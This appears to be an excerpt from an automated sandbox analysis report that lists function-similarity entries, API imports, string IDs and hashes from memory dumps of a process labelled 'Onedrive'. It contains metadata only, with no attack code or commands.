                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Concurrency::details::_HandleModuleSchedulerScheduler::_
                                        • String ID: CorExitProcess$mscoree.dll
                                        • API String ID: 302703240-1276376045
                                        • Opcode ID: b34438bd74859ec22cf35c33e7849494b920b0bc9de5fd7c946b7d7eaf88f171
                                        • Instruction ID: f2e461cae3aba7752928ee7dee2fd78a55cee5a911571f9f5784a045fec44cd0
                                        • Opcode Fuzzy Hash: b34438bd74859ec22cf35c33e7849494b920b0bc9de5fd7c946b7d7eaf88f171
                                        • Instruction Fuzzy Hash: 80116332A1EE43A1EA20EB11E45126EB360FF887D5F500235E69E467E5EF7CD204CB00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: DirectElement@V12@$Descendent@FindRoot@
                                        • String ID: EnterNumber
                                        • API String ID: 1418815912-1845196359
                                        • Opcode ID: e83e042111be38edb18aba9be0cb80e9d35a4fae5e9649dce248d94c2b7ead39
                                        • Instruction ID: bd980efd09011be356dd6676792659d21cb1e6de936d73445d64823fffe60c97
                                        • Opcode Fuzzy Hash: e83e042111be38edb18aba9be0cb80e9d35a4fae5e9649dce248d94c2b7ead39
                                        • Instruction Fuzzy Hash: 1CF04936A08F82D2DB108B06B85003DBAA4FB8AFA4B58D131DA4E83718CF3CD5518740
                                        APIs
                                        • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF6104FB8B0
                                        • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF6104FB8C2
                                        • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70 ref: 00007FF6104FBA17
                                        • ?SetCaretPosition@TouchEdit2@DirectUI@@QEAAJJ@Z.DUI70 ref: 00007FF6104FBA2A
                                          • Part of subcall function 00007FF6104FBB50: StrToID.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB6B
                                          • Part of subcall function 00007FF6104FBB50: ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB7E
                                          • Part of subcall function 00007FF6104FBB50: ?CreateString@Value@DirectUI@@SAPEAV12@PEBGPEAUHINSTANCE__@@@Z.DUI70(?,?,00000000,00007FF6104FB9AC), ref: 00007FF6104FBB96
                                          • Part of subcall function 00007FF6104FAF8C: ?GetContentString@Element@DirectUI@@QEAAPEBGPEAPEAVValue@2@@Z.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FAFB3
                                          • Part of subcall function 00007FF6104FAF8C: ?Release@Value@DirectUI@@QEAAXXZ.DUI70(?,?,00000000,00007FF6104F360B), ref: 00007FF6104FB05A
                                          • Part of subcall function 00007FF6104FB6D8: ?GetSelection@TouchEdit2@DirectUI@@QEAAJPEAJ0@Z.DUI70(?,?,00000000,00007FF6104FB9D1), ref: 00007FF6104FB6F6
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Direct$Element@String@$ContentEdit2@Touch$CaretPosition@V12@Value@$CreateDescendent@E__@@@FindRelease@Selection@Value@2@@
                                        • String ID:
                                        • API String ID: 94149341-0
                                        • Opcode ID: 9617a7bb773a2561373628f6bd13398476fa04b197ade44adbcccafdb8f5e440
                                        • Instruction ID: 605b0bf60d62f540f38d0b234534456af511bb09e16899944d99bc199a30cf53
                                        • Opcode Fuzzy Hash: 9617a7bb773a2561373628f6bd13398476fa04b197ade44adbcccafdb8f5e440
                                        • Instruction Fuzzy Hash: 46712972F08D02EAEF109B69C4815BC23B9AB49FA8B545036DE0DD3769DE38E951C381
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: _wcsicmp$Heap$FreeProcess
                                        • String ID: VolumeActivationOrder
                                        • API String ID: 1178357170-1688881641
                                        • Opcode ID: 6c4fa031bcdf362423f6d4512dab34f2224128750b836ea986aa50372eb6991f
                                        • Instruction ID: 2b03144929a5f9099f165ee432b9ec58bf84bf2a7b475d1369fe59e1d725cae6
                                        • Opcode Fuzzy Hash: 6c4fa031bcdf362423f6d4512dab34f2224128750b836ea986aa50372eb6991f
                                        • Instruction Fuzzy Hash: 73519122B08E02E9FF00AB69C5D02BD27A5AB08BA8F504535DE5ED3795CE3CE415C340
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: State$FrameHandler3::$BaseControlCurrentFromImage
                                        • String ID:
                                        • API String ID: 380775268-0
                                        • Opcode ID: 2b8d69faa660a943a0bdc955ef5d249da78b774ef58b2996c34eb496772773d0
                                        • Instruction ID: dae0755c9e5a365b7f66205229e46d0443ff203601b19cf0234b667e13c8a748
                                        • Opcode Fuzzy Hash: 2b8d69faa660a943a0bdc955ef5d249da78b774ef58b2996c34eb496772773d0
                                        • Instruction Fuzzy Hash: 9861DD3290AA8696D670DF55E08137AB7A0FBC47C9F204535E68D83B56CF3CD541CB40
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 2f7c10dc392a8beebdcaf5d5ec4e5980cc8a6edf76ac842f313593ddf91837bd
                                        • Instruction ID: 1b33fcab1ca8c7b46ae94cc8a69fecdfc2d986553647dd7454395e26f9455d8a
                                        • Opcode Fuzzy Hash: 2f7c10dc392a8beebdcaf5d5ec4e5980cc8a6edf76ac842f313593ddf91837bd
                                        • Instruction Fuzzy Hash: E741F02290EE4296E750EB25E48137EA6A0FBE87C0F505535E78E87B69DF3CD8518B40
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: c1bbe7d162f3c17f6aa1b842b0bac6b4a5da5a76b085f756f886f65c816da4db
                                        • Instruction ID: 2a7aa40f10a2d8012513437a52b066d601abd81869f81602dafe5808671d1be3
                                        • Opcode Fuzzy Hash: c1bbe7d162f3c17f6aa1b842b0bac6b4a5da5a76b085f756f886f65c816da4db
                                        • Instruction Fuzzy Hash: AB41ED26A1EE4396E750AB25E45137EA7A0FBD87C0F100535E78D87BA9DF7CD4418B40
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 65ca2b3be36425672bca3afb5c9c352ffdf7975c78d53ac71ca2cb9e3fff23dc
                                        • Instruction ID: a91f7bbe1daee45c159ccec095112dcd6317a48ab99427034f78b6f85794a026
                                        • Opcode Fuzzy Hash: 65ca2b3be36425672bca3afb5c9c352ffdf7975c78d53ac71ca2cb9e3fff23dc
                                        • Instruction Fuzzy Hash: 8F410F36A1EE4296E750AB25E54137EA7A0FBE87C0F104536F68D47BA9DF3CD4418B40
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: String$AllocFreeInfoswscanf_s
                                        • String ID:
                                        • API String ID: 3357541311-0
                                        • Opcode ID: 111d8d7a1cea06b5bdfedafb94a9521ac448ce82393592737d324e9f97004f28
                                        • Instruction ID: 238b04042286669fc717ae6f52fe72a7f6a412af7570d377326177718e6063ee
                                        • Opcode Fuzzy Hash: 111d8d7a1cea06b5bdfedafb94a9521ac448ce82393592737d324e9f97004f28
                                        • Instruction Fuzzy Hash: 3331B421B0CE82E2EE215B19A5903FDA656AFC9FA5F598034DB4EC7785DF3CE4258700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Heap$FreeProcess$ErrorFieldLastSetupString
                                        • String ID:
                                        • API String ID: 2588027753-0
                                        • Opcode ID: f5ac4ce10f203f946f340c793e59218f307c3b1212e54002b8199b7ad844837d
                                        • Instruction ID: 699407460a1efd148291d97643d75872d15b3940d32d4790420d9039c163b0ee
                                        • Opcode Fuzzy Hash: f5ac4ce10f203f946f340c793e59218f307c3b1212e54002b8199b7ad844837d
                                        • Instruction Fuzzy Hash: A631B331A0CE83E6EE106B2994902BE72A5BF85BA4F554035D74EC7394EE3DE4118780
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                        • String ID:
                                        • API String ID: 140117192-0
                                        • Opcode ID: 2f80be9b24c969473baa277da42d0dd32167ed74b2d91ba5b62fed090ae2c901
                                        • Instruction ID: c0f85b73528e34a3a74a44de2cf3e2931d8337652c9438338586c8c83520557c
                                        • Opcode Fuzzy Hash: 2f80be9b24c969473baa277da42d0dd32167ed74b2d91ba5b62fed090ae2c901
                                        • Instruction Fuzzy Hash: D741C639A0CF02A5EE508B19F99036973A4FB88B69FA04135DA8DC3769DF7CE554C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CloseFreeGenerateInstallationLocalOfflineOpen
                                        • String ID:
                                        • API String ID: 3853244748-0
                                        • Opcode ID: a810da95c3ee36892a5de623d229d3be3f55b933a0224017fdab30da134d756a
                                        • Instruction ID: bcbfb8cf89a1a8102536be2e6d4c399de6c14092d3921fbbc230290cbd5c4085
                                        • Opcode Fuzzy Hash: a810da95c3ee36892a5de623d229d3be3f55b933a0224017fdab30da134d756a
                                        • Instruction Fuzzy Hash: 15218C61B08F82D6EF009B55A59037DA7A8EB89FE4F048534DA4EC7785DF6CE4258700
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: CriticalSection__vcrt_lock$Concurrency::details::_DeleteEnterSchedulerScheduler::_
                                        • String ID:
                                        • API String ID: 27951074-0
                                        • Opcode ID: 2f47923555553ca6756138a1e64b3529e04dd95027dec79b470d6570f577df9a
                                        • Instruction ID: ee64f3cc36945c774025bd62a5a34b846cb3b313ffd23ee4ae510f2e20cfd4ba
                                        • Opcode Fuzzy Hash: 2f47923555553ca6756138a1e64b3529e04dd95027dec79b470d6570f577df9a
                                        • Instruction Fuzzy Hash: E221F125A0AE4796EB30DB19E49133A63A0FB9CBC9F501236DACD477A5DE3DE5058B00
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568101163.00007FF610507000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff6104f0000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ActivationGrantsToken$CloseFreeOpen
                                        • String ID:
                                        • API String ID: 964983634-0
                                        • Opcode ID: e527d962a64576a8af28e7d2c8c537f59b4613da025981c347f8ddf7a783fd70
                                        • Instruction ID: 0e2540bcb72b2c8708cf6c2494d002b483de07f6e90cf4a6c783473b46b435b0
                                        • Opcode Fuzzy Hash: e527d962a64576a8af28e7d2c8c537f59b4613da025981c347f8ddf7a783fd70
                                        • Instruction Fuzzy Hash: 54216A62B08A42D6EF144B59E590379AAA4FB8AFA4F168131DA0EC3354CF3DE8608701
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: Container_base12Container_base12::~_ErrorFileLastModuleName_dosmaperrstd::_
                                        • String ID:
                                        • API String ID: 2518310752-0
                                        • Opcode ID: 884c5efd9a5742059d0b79e7ed1e330083409f75ff9e6496b94d5f74a7548500
                                        • Instruction ID: 7b0fc8e229f6ec850cd2cac8ce88457aa79b2a30604b5d6e2a56002f35fa356b
                                        • Opcode Fuzzy Hash: 884c5efd9a5742059d0b79e7ed1e330083409f75ff9e6496b94d5f74a7548500
                                        • Instruction Fuzzy Hash: 69117F32A1AA82A6E760EB24E4453AF77A0FB983C4F401135F68E46B69DF7CD144CF40
                                        Strings
                                        • D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp, xrefs: 00007FF8A03042C7
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\per_thread_data.cpp
                                        • API String ID: 0-277556848
                                        • Opcode ID: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
                                        • Instruction ID: a593c7c8c647c18928dddfcde21b23fd70f86da6b72a1c5577c4b8b9a559e3a6
                                        • Opcode Fuzzy Hash: cb6ecb3aaef34b468bae1170072a2830f2fb51ed3aefea9556cec36e5ef26729
                                        • Instruction Fuzzy Hash: 07414A61A2FD43B1E650EB94E8503BAA265FF903D4F601231F29E427E6DF6CE6148B40
                                        Strings
                                        • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030ACE4
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 0-3378279506
                                        • Opcode ID: 6d7ec9261b6e7ff48fb581261d091401e4b3bd5866dffb7fb484ad0837b6df4c
                                        • Instruction ID: 8bf4f4bd14e4aad1c2c29d8e3c02d390ee4dc928627c69a806954e51bb278d5d
                                        • Opcode Fuzzy Hash: 6d7ec9261b6e7ff48fb581261d091401e4b3bd5866dffb7fb484ad0837b6df4c
                                        • Instruction Fuzzy Hash: C431502151EF8291EA20DB55F05036E77A0FB85BD4F600232F6DD86BDADF2CD5018B40
                                        Strings
                                        • minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h, xrefs: 00007FF8A030ABA1
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                        • API String ID: 0-3378279506
                                        • Opcode ID: 2b22b30b438b324ff4d40baa6bb5dc005a0da452e6cb4f6b3b9614bae950eae4
                                        • Instruction ID: ce43a5886182666fa44fc71b59737b00803a478207d9ebbebf95333f48e1c48c
                                        • Opcode Fuzzy Hash: 2b22b30b438b324ff4d40baa6bb5dc005a0da452e6cb4f6b3b9614bae950eae4
                                        • Instruction Fuzzy Hash: D7315E2191EF82A1EA20DB55F04136E77A5EB857E4F600231F6ED467E5CF2CD5018B40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID: ExceptionFileHeaderRaise
                                        • String ID: csm
                                        • API String ID: 2573137834-1018135373
                                        • Opcode ID: 3dce9d5ffc41d897f93aecee3ad84683867be43052ef9da2edad16db5feba034
                                        • Instruction ID: ae793ebbb45dcac34ad3a2da9c3e748795c81b39f1b8944ce548f4f6d97d4e31
                                        • Opcode Fuzzy Hash: 3dce9d5ffc41d897f93aecee3ad84683867be43052ef9da2edad16db5feba034
                                        • Instruction Fuzzy Hash: 1E31D03621AF8986DBA08F59F88031AB7A4F389B94F504225EBCD47B68DF7CC554CB00
                                        Strings
                                        • minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp, xrefs: 00007FF8A0319202
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568144214.00007FF8A0301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A0300000, based on PE: true
                                        • Associated: 00000003.00000002.4568124770.00007FF8A0300000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568185783.00007FF8A0342000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568209327.00007FF8A0358000.00000004.00000001.01000000.00000009.sdmpDownload File
                                        • Associated: 00000003.00000002.4568233286.00007FF8A035D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_7ff8a0300000_Onedrive.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp
                                        • API String ID: 0-2685728405
                                        • Opcode ID: f0b89c81be12142a5036038e0274ffe8156e1e0663c88568edabf4c66ad31f58
                                        • Instruction ID: 4bbf8fd56214124bebe84b572c72056c54c075eaff21a7b47708ae59c1a17d1c
                                        • Opcode Fuzzy Hash: f0b89c81be12142a5036038e0274ffe8156e1e0663c88568edabf4c66ad31f58
                                        • Instruction Fuzzy Hash: A421342261DE86A2DE50CB15F44025AB3A4FBC47E0F500731F6AE46BE9DF7CD1508B00
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.4568034108.00007FF6104F1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6104F0000, based on PE: true
                                        • Associated: 00000003.00000002.4568007903.00007FF6104F0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568057962.00007FF610501000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000003.00000002.4568082269.00007FF610506000.00000004.00000001.01000000.00000008.sdmpDownload File
